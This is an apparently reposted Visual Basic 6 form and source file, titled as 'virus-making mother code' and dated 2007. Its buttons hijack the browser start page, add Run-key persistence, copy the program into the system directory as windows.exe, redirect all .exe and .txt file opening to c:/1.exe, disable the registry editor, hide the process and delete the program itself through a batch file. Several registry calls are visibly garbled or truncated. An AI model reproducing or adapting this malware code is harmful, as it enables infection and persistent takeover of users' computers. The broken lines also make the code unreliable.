|
VERSION 5.00
Begin VB.Form Form1
BorderStyle = 1 'Fixed Single
Caption = "6331905VB制造病毒母代码"
ClientHeight = 6630
ClientLeft = 45
ClientTop = 435
ClientWidth = 7815
Icon = "Form1.frx":0000
LinkTopic = "Form1"
MaxButton = 0 'False
MinButton = 0 'False
ScaleHeight = 6630
ScaleWidth = 7815
StartUpPosition = 2 '屏幕中心
Begin VB.CommandButton Command14
Caption = "清除感染txt"
Height = 495
Left = 4440
TabIndex = 18
Top = 2880
Width = 975
End
Begin VB.CommandButton Command13
Caption = "清除感染exe"
Height = 495
Left = 4440
TabIndex = 17
Top = 2040
Width = 975
End
Begin VB.PictureBox Picture1
Appearance = 0 'Flat
BackColor = &H80000005&
ForeColor = &H80000008&
Height = 5655
Left = 5640
Picture = "Form1.frx":08FF
ScaleHeight = 5625
ScaleWidth = 1905
TabIndex = 16
Top = 840
Width = 1935
End
Begin VB.CommandButton Command12
Caption = "感染txt文件"
Height = 495
Left = 3120
TabIndex = 15
Top = 2880
Width = 1215
End
Begin VB.CommandButton Command11
Caption = "木马自删除"
Height = 495
Left = 3120
TabIndex = 14
Top = 5400
Width = 2295
End
Begin VB.CommandButton Command10
Caption = "隐藏应用程序"
Height = 495
Left = 600
TabIndex = 11
Top = 5400
Width = 1695
End
Begin VB.CommandButton Command9
Caption = "隐藏进程"
Height = 495
Left = 600
TabIndex = 10
Top = 4560
Width = 1695
End
Begin VB.CommandButton Command8
Caption = "修改默认键值"
Height = 495
Left = 3120
TabIndex = 8
Top = 4560
Width = 2295
End
Begin VB.CommandButton Command7
Caption = "修改非默认键值"
Height = 495
Left = 3120
TabIndex = 7
Top = 3720
Width = 2295
End
Begin VB.CommandButton Command6
Caption = "感染exe文件"
Height = 495
Left = 3120
TabIndex = 6
Top = 2040
Width = 1215
End
Begin VB.CommandButton Command5
Caption = "将程序复制到系统目录命名为windows.exe并且开机自启动"
Height = 855
Left = 3120
TabIndex = 5
Top = 840
Width = 2295
End
Begin VB.CommandButton Command4
Caption = "禁止访问注册表"
Height = 495
Left = 600
TabIndex = 4
Top = 3720
Width = 1695
End
Begin VB.CommandButton Command3
Caption = "可以访问注册表"
Height = 495
Left = 600
TabIndex = 3
Top = 2880
Width = 1695
End
Begin VB.CommandButton Command2
Caption = "开机自启动"
Height = 495
Left = 600
TabIndex = 2
Top = 2040
Width = 1695
End
Begin VB.TextBox Text1
Appearance = 0 'Flat
Height = 270
Left = 600
TabIndex = 1
Text = "**"
Top = 840
Width = 1695
End
Begin VB.CommandButton Command1
Caption = "修改主页"
Height = 495
Left = 600
TabIndex = 0
Top = 1200
Width = 1695
End
Begin VB.Label Label3
Caption = "写于2007.6.30日"
Height = 255
Left = 720
TabIndex = 13
Top = 6240
Width = 1455
End
Begin VB.Label Label2
Caption = "QQ:6331905"
BeginProperty Font
Name = "宋体"
Size = 18
Charset = 134
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
ForeColor = &H000000FF&
Height = 375
Left = 3240
TabIndex = 12
Top = 6120
Width = 1935
End
Begin VB.Shape Shape1
BorderColor = &H80000000&
Height = 1085
Left = 480
Top = 720
Width = 1940
End
Begin VB.Label Label1
Caption = $"Form1.frx":6100
Height = 615
Left = 360
TabIndex = 9
Top = 120
Width = 7095
End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Option Explicit
Dim systempath As String
Private Sub Command1_Click() '修改主页
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER,"Software/Microsoft/Internet Explorer/Main",hKey
RegSetValueEx hKey,"Start Page",REG_SZ,ByVal Me.Text1.Text,30
If Me.Text1.Text = "" Then
RegSetValueEx hKey,ByVal "about:blank",30
RegCloseKey hKey
End If
End Sub
Private Sub Command10_Click()
App.TaskVisible = False '隐藏应用程序
End Sub
Private Sub Command11_Click()
Dim s As String
On Error Resume Next
s = CurDir '当前目录
'保证目录最后的字符为 "/"
If Right(s,1) <> "/" Then
s = s & "/"
End If '在当前目录下创建bat文件
Open s & "kill.bat" For Output As #1
Print #1,":redel"
Print #1,"del " & Chr(34) & s & App.EXEName & ".exe" & Chr(34)
Print #1,"if exist " & Chr(34) & s & App.EXEName & ".exe" & Chr(34) & " goto redel"
Print #1,"del %0"
Print #1,
Close #1
Shell Chr(34) & s & "kill.bat" & Chr(34)
End
End Sub
Private Sub Command12_Click() '感染txt文件,描述见下面感染exe文件,txt文件默认数据为C:/windows/notepad.exe %1
Dim hKey As Long
RegCreateKey HKEY_CLASSES_ROOT,"txtfile/shell/open/command/","",ByVal "C:/1.exe",30
RegCloseKey hKey
Dim a As String
a = Command()
If a = "" Then
Else
Shell a,1
End If
End Sub
Private Sub Command13_Click() '清除感染exe文件
Dim x As String
x = Chr$(34) + "%1" + Chr$(34) + Chr$(32) + "%*"
Dim hKey As Long
RegCreateKey HKEY_CLASSES_ROOT,"exefile/shell/open/command/",ByVal x,30
RegCloseKey hKey
End Sub
Private Sub Command14_Click() '清除感染txt文件
Dim hKey As Long
RegCreateKey HKEY_CLASSES_ROOT,ByVal "C:/windows/notepad.exe %1",30
RegCloseKey hKey
Dim a As String
End Sub
'如果让程序开机运行,需要先把文件编译为可执行文件放到特定目录下,
'并修改注册表让其开机便运行,
'路径是/HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVerson/Run
Private Sub Command2_Click() '无论该文件放在什么位置都可以实现开机自启动
Dim hKey As Long,SubKey As String,Exe As String
SubKey = "Software/Microsoft/Windows/CurrentVersion/Run"
Exe = App.Path & "/" & App.EXEName & ".exe"
RegCreateKey HKEY_LOCAL_MACHINE,SubKey,"19911593",ByVal Exe,LenB(StrConv(Exe,vbFromUnicode)) + 1
RegCloseKey hKey
End Sub
'禁止修改注册表方法为:
'展开注册表到
'HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System
'下,新建一个名为DisableRegistryTools的DWORD值,并将其值改为“1”,即可禁止使用注册表编辑器Regedit,"0"为可用
Private Sub Command3_Click() '可以使用注册表
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/System","DisableRegistryTools",REG_DWORD,0&,4
'0&就是设置DWORD值为0,1&就是设置DWORD值为1
RegCloseKey hKey
End Sub
Private Sub Command4_Click() '禁止使用注册表
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER,1&,4
RegCloseKey hKey
End Sub
Private Sub Command5_Click() '将程序复制到系统目录
systempath = String(255,Chr(0))
GetSystemDirectory systempath,254
systempath = Left(systempath,InStr(systempath,Chr(0)) - 1)
'先检查系统目录有无windows.exe文件,如果没有,自我复制到系统目录命名为windows.exe
If Not Dir(systempath & "/" & "windows.exe") = "windows.exe" Then
FileCopy App.Path & "/" & App.EXEName & ".exe",systempath & "/" & "windows.exe"
End If
'以下为设置系统目录的windows.exe为开机自启动,名称为6331905,数据为windows.exe
Dim hKey As Long,Exe As String
SubKey = "Software/Microsoft/Windows/CurrentVersion/Run"
Exe = (systempath & "/" & "windows.exe")
RegCreateKey HKEY_LOCAL_MACHINE,"6331905",vbFromUnicode)) + 1
RegCloseKey hKey
End Sub
'VB制作EXE文件关联,并运行指定文件,其实就是修改默认键值
'原理: 实现该程序主要是修改注册表的数据值
'1.在注册表HKEY_CLASSES_ROOT/exefile/shell/open/command/的默认数据值为"%1" %*
'该"%1" %*默认数据值控制着exe文件的打开
'2.只要修改默认数据值就可以实现文件关联
'比如,把"%1" %*修改为c:/1.exe %1,请大家在c:/放1个任何1.exe文件,看看运行
'你电脑里面的任何exe程序会发生什么效果
'说明:
'(1) "%1" %*则表示所有EXE文件本身直接运行(EXE 可以直接运行,
'所以用表示程序本身的%1即可),后面的%*则表示程序命令后带的所有参数
'(这就是为什么EXE文件可以带参数运行的原因)。
'(2) 1.exe %1,表示将所有文件类型为EXE(exefile表示为EXE类型文件)的
'文件都通过“记事本”程序打开,后面的%1表示要打开的程序本身(就是双击时的那个程序)。
Private Sub Command6_Click()
Dim hKey As Long
RegCreateKey HKEY_CLASSES_ROOT,ByVal "c:/1.exe %1",30
RegCloseKey hKey
Dim a As String '定义一个字符变量,用来存放当前文件的绝对路径
a = Command() '将绝对路径存放到变量a中
If a = "" Then '如果a的路径为空,则什么都不执行
Else '否则执行程序
Shell a,1 '这是打开变量a指定路径的文件,运行参数为默认
End If
End Sub
Private Sub Command7_Click() '修改HKEY_CURRENT_USER/Console/FaceNamed的键值
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER,"Console/","FaceName",ByVal "16697000",30
RegCloseKey hKey
End Sub
Private Sub Command8_Click() '修改HKEY_CURRENT_USER/Console的默认键值
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER,30
RegCloseKey hKey
End Sub
Private Sub Command9_Click() '该隐藏进程方法在原版XP2上通过,在雨林木风GHOST版本未通过,有研究的愿意交流 HideCurrentProcess '隐藏进程 End Sub (编辑:李大同)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|
